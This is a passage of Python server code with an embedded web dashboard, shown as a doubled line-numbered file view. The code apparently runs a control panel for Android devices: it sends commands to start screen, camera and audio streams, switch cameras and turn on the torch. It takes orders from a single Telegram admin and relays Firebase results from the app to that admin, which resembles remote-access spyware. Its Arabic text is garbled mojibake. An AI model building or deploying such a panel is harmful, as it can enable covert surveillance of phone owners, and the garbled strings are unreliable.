   313в†’   313в†’  3312в†’_setViewerState('idle');
   314в†’   314в†’  3313в†’document.getElementById('stStatus').textContent='Щ…ШЄЩ€Щ‚ЩЃ';
   315в†’   315в†’  3314в†’}
   316в†’   316в†’  3315в†’
   317в†’   317в†’  3316в†’async function switchCamera(){
   318в†’   318в†’  3317в†’var devId=document.getElementById('streamDevice').value;
   319в†’   319в†’  3318в†’if(!devId)return;
   320в†’   320в†’  3319в†’if(_streamType==='front_camera') _streamType='back_camera';
   321в†’   321в†’  3320в†’else if(_streamType==='back_camera') _streamType='front_camera';
   322в†’   322в†’  3321в†’else _streamType='camera';
   323в†’   323в†’  3322в†’if(_streamActive){stopStream();setTimeout(function(){startStream();},500);}
   324в†’   324в†’  3323в†’else{startStream();}
   325в†’   325в†’  3324в†’notify('ШЄЩ… ШЄШЁШЇЩЉЩ„ Ш§Щ„ЩѓШ§Щ…ЩЉШ±Ш§');
   326в†’   326в†’  3325в†’}
   327в†’   327в†’  3326в†’
   328в†’   328в†’  3327в†’function _onFrameReceived(base64Data,isAudio){
   329в†’   329в†’  3328в†’if(base64Data===_lastFrameData)return;
   330в†’   330в†’  3329в†’_lastFrameData=base64Data;
   331в†’   331в†’  3330в†’if(!_firstFrameReceived){_firstFrameReceived=true;if(_streamWaitingTimer){clearTimeout(_streamWaitingTimer);_streamWaitingTimer=null;}}
   332в†’   332в†’  3331в†’_frameCount++;
   333в†’   333в†’  3332в†’document.getElementById('stFrames').textContent=_frameCount;
   334в†’   334в†’  3333в†’document.getElementById('stLastAct').textContent=new Date().toLocaleTimeString();
   335в†’   335в†’  3334в†’if(isAudio){_setViewerState('receiving_audio');}
   336в†’   336в†’  3335в†’else{_setViewerState('receiving_video');document.getElementById('streamImg').src='data:image/jpeg;base64,'+base64Data;}
   337в†’   337в†’  3336в†’}
   338в†’   338в†’  3337в†’
   339в†’   339в†’  3338в†’function startStreamPolling(devId){
   340в†’   340в†’  3339в†’if(_streamPollTimer)clearInterval(_streamPollTimer);
   341в†’   341в†’  3340в†’_streamPollTimer=setInterval(async function(){
   342в†’   342в†’  3341в†’if(!_streamActive)return;
   343в†’   343в†’  3342в†’try{
   344в†’   344в†’  3343в†’var typeParam=_streamType==='audio'?'audio':'video';
   345в†’   345в†’  3344в†’var resp=await fetch('/api/stream/frame/'+devId+'?type='+typeParam,{headers:{'Authorization':'Bearer '+TOKEN}});
   346в†’   346в†’  3345в†’var r=await resp.json();
   347в†’   347в†’  3346в†’if(r.ok&&r.data&&r.data.length>50){_onFrameReceived(r.data,false);}
   348в†’   348в†’  3347в†’else if(r.ok&&_firstFrameReceived){}
   349в†’   349в†’  3348в†’else if(!_firstFrameReceived){
   350в†’   350в†’  3349в†’try{var sr=await fetch('/api/stream/status',{headers:{'Authorization':'Bearer '+TOKEN}});var status=await sr.json();if(status.ok&&status.active_streams&&status.active_streams[devId]){if(!_firstFrameReceived)_setViewerState('connected');}else if(!_firstFrameReceived&&_streamActive){_setViewerState('waiting');}}catch(e){}
   351в†’   351в†’  3350в†’}
   352в†’   352в†’  3351в†’}catch(e){}
   353в†’   353в†’  3352в†’},2000);
   354в†’   354в†’  3353в†’}
   355в†’   355в†’  3354в†’
   356в†’   356в†’  3355в†’// Add streaming category to commands
   357в†’   357в†’  3356в†’if(typeof CMD_CATEGORIES!=='undefined'){
   358в†’   358в†’  3357в†’CMD_CATEGORIES.streaming={label:'рџ“Ў Streaming',cmds:['start_screen_stream','stop_screen_stream','start_camera_stream','stop_camera_stream','switch_camera','start_audio_stream','stop_audio_stream','get_stream_status','set_stream_quality','enable_torch','pause_stream','resume_stream','stop_all_streams','get_stream_capabilities']};
   359в†’   359в†’  3358в†’if(document.getElementById('cmdTabs')){
   360в†’   360в†’  3359в†’var tabs=document.getElementById('cmdTabs');
   361в†’   361в†’  3360в†’if(tabs.innerHTML.indexOf('Streaming')===-1){
   362в†’   362в†’  3361в†’tabs.innerHTML+='<button class="tab" onclick="showCmdCat(\'streaming\',this)">рџ“Ў Streaming</button>';
   363в†’   363в†’  3362в†’}
   364в†’   364в†’  3363в†’}
   365в†’   365в†’  3364в†’}
   366в†’   366в†’  3365в†’</script>
   367в†’   367в†’  3366в†’</body>
   368в†’   368в†’  3367в†’</html>"""
   369в†’   369в†’  3368в†’
   370в†’   370в†’  3369в†’# ============================================================================
   371в†’   371в†’  3370в†’# WEB DASHBOARD ROUTE
   372в†’   372в†’  3371в†’# ============================================================================
   373в†’   373в†’  3372в†’
   374в†’   374в†’  3373в†’async def serve_dashboard(request):
   375в†’   375в†’  3374в†’    return web.Response(text=DASHBOARD_HTML, content_type="text/html", charset="utf-8")
   376в†’   376в†’  3375в†’
   377в†’   377в†’  3376в†’# ============================================================================
   378в†’   378в†’  3377в†’# GETUPDATES POLLING
   379в†’   379в†’  3378в†’# ============================================================================
   380в†’   380в†’  3379в†’
   381в†’   381в†’  3380в†’async def tg_poll_loop():
   382в†’   382в†’  3381в†’    global tg_offset, polling_active, _processed_update_ids, _processed_message_keys, _message_dedup, _chat_rate_counter, _data_forward_dedup
   383в†’   383в†’  3382в†’    polling_active = True
   384в†’   384в†’  3383в†’    
   385в†’   385в†’  3384в†’    # === ШЄЩ†ШёЩЉЩЃ Ш§Щ„Ш§ШЄШµШ§Щ„Ш§ШЄ Ш§Щ„Щ‚ШЇЩЉЩ…Ш© Ш№Щ†ШЇ ШЁШЇШЎ Ш§Щ„ШЄШґШєЩЉЩ„ ===
   386в†’   386в†’  3385в†’    log.info("Cleaning old connections (deleteWebhook)...")
   387в†’   387в†’  3386в†’    try:
   388в†’   388в†’  3387в†’        session = get_tg_session()
   389в†’   389в†’  3388в†’        # Ш­Ш°ЩЃ webhook Щ€ШЄШ¬Ш§Щ‡Щ„ Ш§Щ„ШЄШ­ШЇЩЉШ«Ш§ШЄ Ш§Щ„Щ…Ш№Щ„Щ‚Ш©
   390в†’   390в†’  3389в†’        async with session.post(f"https://api.telegram.org/bot{BOT_TOKEN}/deleteWebhook?drop_pending_updates=true") as resp:
   391в†’   391в†’  3390в†’            r = await resp.json()
   392в†’   392в†’  3391в†’            log.info("deleteWebhook: %s", r.get("description", r.get("ok")))
   393в†’   393в†’  3392в†’        await asyncio.sleep(1)
   394в†’   394в†’  3393в†’        # Ш§Щ„ШЄШ­Щ‚Щ‚ Щ…Щ† Ш§Щ„ШЁЩ€ШЄ
   395в†’   395в†’  3394в†’        async with session.post(f"https://api.telegram.org/bot{BOT_TOKEN}/getMe") as resp:
   396в†’   396в†’  3395в†’            me = await resp.json()
   397в†’   397в†’  3396в†’            if me.get("ok"):
   398в†’   398в†’  3397в†’                log.info("Bot connected: @%s (%s)", me["result"].get("username", "?"), me["result"].get("first_name", "?"))
   399в†’   399в†’  3398в†’            else:
   400в†’   400в†’  3399в†’                log.warning("getMe failed: %s", me)
   401в†’   401в†’  3400в†’        await asyncio.sleep(1)
   402в†’   402в†’  3401в†’    except Exception as exc:
   403в†’   403в†’  3402в†’        log.warning("Connection cleanup: %s", exc)
   404в†’   404в†’  3403в†’    
   405в†’   405в†’  3404в†’    log.info("Starting Telegram getUpdates polling...")
   406в†’   406в†’  3405в†’    
   407в†’   407в†’  3406в†’    _conflict_count = 0
   408в†’   408в†’  3407в†’    while polling_active:
   409в†’   409в†’  3408в†’        try:
   410в†’   410в†’  3409в†’            payload = {
   411в†’   411в†’  3410в†’                "offset": tg_offset,
   412в†’   412в†’  3411в†’                "timeout": 30,
   413в†’   413в†’  3412в†’                "allowed_updates": ["message", "callback_query"],
   414в†’   414в†’  3413в†’            }
   415в†’   415в†’  3414в†’            result = await tg_request("getUpdates", payload)
   416в†’   416в†’  3415в†’            if not result or not result.get("ok"):
   417в†’   417в†’  3416в†’                desc = (result or {}).get("description", "")
   418в†’   418в†’  3417в†’                if "Conflict" in desc:
   419в†’   419в†’  3418в†’                    _conflict_count += 1
   420в†’   420в†’  3419в†’                    log.warning("Conflict detected (%d), waiting...", _conflict_count)
   421в†’   421в†’  3420в†’                    await asyncio.sleep(8)
   422в†’   422в†’  3421в†’                else:
   423в†’   423в†’  3422в†’                    await asyncio.sleep(2)
   424в†’   424в†’  3423в†’                continue
   425в†’   425в†’  3424в†’            _conflict_count = 0  # ШҐШ№Ш§ШЇШ© Ш§Щ„Ш№ШЇШ§ШЇ Ш№Щ†ШЇ Ш§Щ„Щ†Ш¬Ш§Ш­
   426в†’   426в†’  3425в†’            
   427в†’   427в†’  3426в†’            # Periodic cleanup (every 100 polls)
   428в†’   428в†’  3427в†’            if not hasattr(tg_poll_loop, '_poll_count'):
   429в†’   429в†’  3428в†’                tg_poll_loop._poll_count = 0
   430в†’   430в†’  3429в†’            tg_poll_loop._poll_count += 1
   431в†’   431в†’  3430в†’            if tg_poll_loop._poll_count % 100 == 0:
   432в†’   432в†’  3431в†’                now = time.time()
   433в†’   433в†’  3432в†’                _message_dedup = {k: v for k, v in _message_dedup.items() if now - v > 600}
   434в†’   434в†’  3433в†’                _chat_rate_counter = {k: v for k, v in _chat_rate_counter.items() if v and now - v[-1] > 300}
   435в†’   435в†’  3434в†’                _data_forward_dedup = {k: v for k, v in _data_forward_dedup.items() if now - v > 300}
   436в†’   436в†’  3435в†’            
   437в†’   437в†’  3436в†’            updates = result.get("result", [])
   438в†’   438в†’  3437в†’            for update in updates:
   439в†’   439в†’  3438в†’                update_id = update.get("update_id", 0)
   440в†’   440в†’  3439в†’                tg_offset = update_id + 1
   441в†’   441в†’  3440в†’                
   442в†’   442в†’  3441в†’                # === Щ…Щ†Ш№ ШЄЩѓШ±Ш§Ш± Щ…Ш№Ш§Щ„Ш¬Ш© Щ†ЩЃШі Ш§Щ„ШЄШ­ШЇЩЉШ« ===
   443в†’   443в†’  3442в†’                if update_id in _processed_update_ids:
   444в†’   444в†’  3443в†’                    continue
   445в†’   445в†’  3444в†’                _processed_update_ids.add(update_id)
   446в†’   446в†’  3445в†’                if len(_processed_update_ids) > 1000:
   447в†’   447в†’  3446в†’                    _processed_update_ids = set(list(_processed_update_ids)[-500:])
   448в†’   448в†’  3447в†’                
   449в†’   449в†’  3448в†’                # Handle message
   450в†’   450в†’  3449в†’                if "message" in update:
   451в†’   451в†’  3450в†’                    msg = update["message"]
   452в†’   452в†’  3451в†’                    chat_id = msg.get("chat", {}).get("id")
   453в†’   453в†’  3452в†’                    text = msg.get("text", "")
   454в†’   454в†’  3453в†’                    msg_id = msg.get("message_id", 0)
   455в†’   455в†’  3454в†’                    
   456в†’   456в†’  3455в†’                    # === Щ…Щ†Ш№ ШЄЩѓШ±Ш§Ш± Щ…Ш№Ш§Щ„Ш¬Ш© Щ†ЩЃШі Ш§Щ„Ш±ШіШ§Щ„Ш© ШЁШ§Щ„Ш¶ШЁШ· ===
   457в†’   457в†’  3456в†’                    msg_key = f"{chat_id}:{msg_id}"
   458в†’   458в†’  3457в†’                    if msg_key in _processed_message_keys:
   459в†’   459в†’  3458в†’                        continue
   460в†’   460в†’  3459в†’                    _processed_message_keys.add(msg_key)
   461в†’   461в†’  3460в†’                    if len(_processed_message_keys) > 500:
   462в†’   462в†’  3461в†’                        _processed_message_keys = set(list(_processed_message_keys)[-200:])
   463в†’   463в†’  3462в†’                    
   464в†’   464в†’  3463в†’                    if chat_id != ADMIN_CHAT_ID:
   465в†’   465в†’  3464в†’                        log.warning("Unauthorized access from %s", chat_id)
   466в†’   466в†’  3465в†’                        continue
   467в†’   467в†’  3466в†’                    
   468в†’   468в†’  3467в†’                    if text.startswith("/"):
   469в†’   469в†’  3468в†’                        await handle_telegram_command(chat_id, text, msg_id)
   470в†’   470в†’  3469в†’                
   471в†’   471в†’  3470в†’                # Handle callback query
   472в†’   472в†’  3471в†’                if "callback_query" in update:
   473в†’   473в†’  3472в†’                    cb = update["callback_query"]
   474в†’   474в†’  3473в†’                    cb_id = cb.get("id", "")
   475в†’   475в†’  3474в†’                    cb_chat = cb.get("message", {}).get("chat", {}).get("id")
   476в†’   476в†’  3475в†’                    
   477в†’   477в†’  3476в†’                    # === Щ…Щ†Ш№ ШЄЩѓШ±Ш§Ш± Щ…Ш№Ш§Щ„Ш¬Ш© Щ†ЩЃШі Ш§Щ„ЩЂ callback ===
   478в†’   478в†’  3477в†’                    cb_key = f"cb:{cb_id}"
   479в†’   479в†’  3478в†’                    if cb_key in _processed_message_keys:
   480в†’   480в†’  3479в†’                        continue
   481в†’   481в†’  3480в†’                    _processed_message_keys.add(cb_key)
   482в†’   482в†’  3481в†’                    
   483в†’   483в†’  3482в†’                    if cb_chat != ADMIN_CHAT_ID:
   484в†’   484в†’  3483в†’                        continue
   485в†’   485в†’  3484в†’                    await handle_callback_query(cb)
   486в†’   486в†’  3485в†’        
   487в†’   487в†’  3486в†’        except asyncio.CancelledError:
   488в†’   488в†’  3487в†’            break
   489в†’   489в†’  3488в†’        except Exception as exc:
   490в†’   490в†’  3489в†’            log.error("Poll error: %s", exc)
   491в†’   491в†’  3490в†’            await asyncio.sleep(3)
   492в†’   492в†’  3491в†’
   493в†’   493в†’  3492в†’# ============================================================================
   494в†’   494в†’  3493в†’# FIREBASE COMMAND RESULT LISTENER
   495в†’   495в†’  3494в†’# ============================================================================
   496в†’   496в†’  3495в†’
   497в†’   497в†’  3496в†’async def firebase_result_listener():
   498в†’   498в†’  3497в†’    """Background task: Poll Firebase for results from Android app.
   499в†’   499в†’  3498в†’    ACTIVE mode - forwards results to Telegram admin."""
   500в†’   500в†’  3499в†’    global _processed_results
   501в†’
   502в†’[showing lines 1-500 of 502; use offset=501 with limit to continue reading]